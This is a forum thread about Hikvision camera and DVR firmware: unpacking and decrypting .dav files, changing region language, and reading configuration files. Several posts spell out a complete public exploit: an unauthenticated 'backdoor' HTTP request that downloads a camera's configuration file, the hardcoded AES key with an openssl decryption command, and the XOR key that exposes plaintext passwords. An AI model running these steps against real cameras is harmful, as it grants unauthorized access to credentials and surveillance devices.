Hikvision FIRMWARE TOOLS - change language, extract files and create own firmware

Discussion in 'Hikvision' started by wzhick, Feb 25, 2015.

Share This Page

  1. habeschi

    habeschi n3wb

    Joined:
    Oct 27, 2017
    Messages:
    21
    Likes Received:
    0
    i used this command to extract the dav file

    test@test-VirtualBox:~$ ./hikpack -t k41 -i digicap.dav -o contents
    Magic : 484b5753
    hdr_crc : 00001d1a (OK)
    lang_id : 00000001
    date_hex: 20150315
    devclass: 00000043
    File: cramfs.img, CRC OK
    WARN: missing new_20.bin trailer file
    Extra tail at the end of dav, 29082624 bytes, maybe firmware id?
    ------------------------------------------------
    The Problem is i don't know which type of firmware i have. i just tried k41 and know it works. i can decrypt the tar.lzma files.

    i use this command:

    test@test-VirtualBox:~$ ./hikpack -t k41 -d webs.tar.lzma -o decrypted/webs.tar.lzma

    by the way: can i use firmware from hikvision to update this OEM DVR?
    Because i have a new product type and there is no firmware update available and i cant activate SSH on the DVR.
    My main intention is to change the logo which is shown if no camrea is connected
     
  2. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    I'm sorry but I don't know the answer to that question - too many unknowns.
     
  3. moh_kasab

    moh_kasab n3wb

    Joined:
    Jan 14, 2018
    Messages:
    3
    Likes Received:
    0
    hello all
    iam new with this firmware stuff so please help me
    i want to modify the dvr firmware so that i can add new pages to the web interface that sends serial output (RS232)
    how can u do it ??
    i tried to create my own firmware and here the steps
    1- used hiktools with digicab.dav so i got cramfs.img
    2- used 7-zip with cramfs.img so that i got webs.tar.lzma

    now how can i open webs.tar.lzma ??? and if i added more pages do i need to modify any files ??? finally how can i repacked the digicap.dav ???

    thx in advance
     
  4. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    The firmware files are encrypted.
    That is quite a complicated topic that needs quite a lot of knowledge and experience - far too much to be simply answered in a post on a forum.
     
  5. moh_kasab

    moh_kasab n3wb

    Joined:
    Jan 14, 2018
    Messages:
    3
    Likes Received:
    0
    alastairstevenson , thank you for your replay

    where can i learn editing firmware or creating firmware ??? i really want to learn it

    thx again
     
  6. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    Maybe not specifically for Hikvision devices - but the same principles apply - there are loads of resources on the internet on the subject, try these google searches for example :
    reverse engineering embedded systems
    how to unpack and repack cramfs images
     
  7. masztalski76

    masztalski76 n3wb

    Joined:
    Jul 21, 2016
    Messages:
    1
    Likes Received:
    0
    Hi,
    I'm new here and need your help.
    I have the Hikvision DS-2CD2232-I5 chinese cam with the original hacked international/english firmware from provider: V5.2.5 build 141201.
    Is there a way to update the firmware to the current official version: IPC - DS-2xx2_5.4.5_170123 (Oops:The page you are visiting may have been deleted,renamed or inaccessible.
    Maybe by modifying the language flag or something else in the version?
    Alternatively, can somebody provide me the hacked english version 5.4.5 for the chinese cam?

    Thank you very much in advance for your answer and support.
     
  8. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    Yes, there is, if you are willing and able to follow some steps.
    Lots of people have had good success with this :

    Unbrick and fully upgrade your R0 / DS-2CD2x32 IP cameras -
    R0 / DS-2CD2x32 BrickfixV2 brick recovery and full upgrade tool - enhanced.

    Make sure to run the 'prtHardInfo' command at the shell prompt to confirm the devType of your specific camera.

    *edit* And the needed R0 5.4.5 firmware is here : DOWNLOAD PORTAL
     
    Last edited: Jan 31, 2018
  9. Alisukov

    Alisukov n3wb

    Joined:
    Mar 3, 2018
    Messages:
    4
    Likes Received:
    1
    Location:
    Russia
    Good afternoon, tell me how to open (decrypt) the configuration file of the Hikvision DS-2CD2032-I camera firmware V5.1.2. Thank you
     
  10. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    OK - assuming that old firmware protects the exported configuration file in the same way as the more recent firmware - and also as the encryption passphrase has been openly published in the CVE associated with the 'plaintext passwords in configuration file' vulnerability, you can use command-line OpenSSL to decrypt the configuration file as follows:
    Code:
    openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
    
    Then if you inspect the result with a hex editor you will see clearly that there is a 4-byte XOR encode operation needed to complete the process.
    It's quite bizarre why any developer at Hikvision thinks it would be useful to just do a straight XOR of the data - there may be a reason, but it's not obvious to me.
     
  11. David101

    David101 n3wb

    Joined:
    Mar 7, 2018
    Messages:
    2
    Likes Received:
    0
    Hello everyone,
    I am new to the forum and IP cameras.

    I bought a hik vision NVR off eBay, the language is chinese, I can't find English on the drop down menu.

    Here are the NVR details

    DS 7608N-E2/8P
    Serial **********AARR*********WCVU
    Master version V3.0.10 build 141126
    Coding version: V5.0 build 140816


    I got some questions if someone can hopefully answer.


    1) is my NVR Chinese? I know it has RR in the serial but chinese is the only language on the menu.

    2) can I change the language to English??
    Any guide for dummies would be appreciated.

    3) I haven't bought any camera yet, but would I need to buy chinese camera or European or international to prevent a language mismatch.

    4) is it possible to update the firmware to English without bricking the NVR.


    I know i have asked a lot but new to this so I am trying to figure this all out.


    Thank in advance.
     
  12. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    Was the language advised in the eBay listing?
    If 'not as described' it might be easiest to return it.
    The alternative is to install hacked firmware.
    It's likely you will get the 15-beep bootloop "!!!You device is illegal !!! !!!You bought in China!!! !!!You must call factory!!!" or words to that effect.
    Bricked as good as.
     
  13. David101

    David101 n3wb

    Joined:
    Mar 7, 2018
    Messages:
    2
    Likes Received:
    0

    Thanks for the reply

    Is there a guide to installing a hack firmware.
     
  14. Alisukov

    Alisukov n3wb

    Joined:
    Mar 3, 2018
    Messages:
    4
    Likes Received:
    1
    Location:
    Russia
    Thanks that responded to help, I'm not such an advanced user
    Your phrase
    you can use the -line OpenSSL command to decrypt the configuration file as follows:
    I understand that this is an SSL request. And it is possible to open the configuration file without accessing the camera
     
    Last edited: Mar 8, 2018
  15. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    It's actually an AES decryption command - it just happens to be part of the large suite of facilities under the OpenSSL software.
    A configuration file can be extracted from a camera by exploiting the 'Hikvision backdoor' vulnerability for cameras with firmware no later than 5.4.41 *edit* earlier than 5.4.41 (and I forget what early version is vulnerable).
    There is an HTTP example somewhere of how to extract a configuration file without requiring a password.
     
    Last edited: Mar 8, 2018
  16. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    This is all in the public domain:

    Here is the HTTP example that can be used against a Hikvision camera without knowing the logon credentials :
    Code:
    http://<camera_IP_address>/System/configurationFile?auth=YWRtaW46MTEK
    Then use the command
    Code:
    openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
    This results in a file that is statically XOR encoded and is obvious by inspection of the contents.
     
  17. Alisukov

    Alisukov n3wb

    Joined:
    Mar 3, 2018
    Messages:
    4
    Likes Received:
    1
    Location:
    Russia
    Thank you for directing in the right direction, about the first one I knew that without knowing the login credentials you can get a configuration and a screenshot, etc. On your command received a file decryptedoutput I'm sorry that it's dull, and what this file is decoded. When you open the notebook (L "¤ G_ђ_DrЉFD: uu2 2 2 <UDs <UDs <UDs <UDs <UDs <UDq" WD + <UDr <UDl <UDs <UD) that's what it writes.
    You can expand on your words-
    "This results in a file that is statically encoded by XOR and is obvious by checking the contents"Configuration_File
    Thanks
     
    Last edited: Mar 9, 2018
  18. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    Remember that this is a binary file - so it cannot be opened with a text editor or similar.
    To examine it you would need a hex editor or hex dump program.
    This is a hex view of the decrypted output of your first configuration file, using the Linux wxHexEditor :
    upload_2018-3-10_10-30-25.png
    As the file is fairly sparse, has a lot of nulls in it, you can see by inspection what the simple XOR hex key would be - 73 8B 55 44
    There are various tools that would do an XOR decode of the file - but it just happens that wxhexEditor has a handy XOR 'view through' function.
    upload_2018-3-10_10-42-14.png

    And this is the result when it is applied :

    upload_2018-3-10_10-44-56.png
     
  19. Alisukov

    Alisukov n3wb

    Joined:
    Mar 3, 2018
    Messages:
    4
    Likes Received:
    1
    Location:
    Russia
    Thanks for helping to make it work.
     
    alastairstevenson likes this.
  20. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    You are welcome.
    It's a big vulnerability - the ability to anonymously extract the configuration file and see the plaintext contents.
    I wonder how much this is being exploited over the internet for those Hikvision cameras that have been 'port forwarded' ?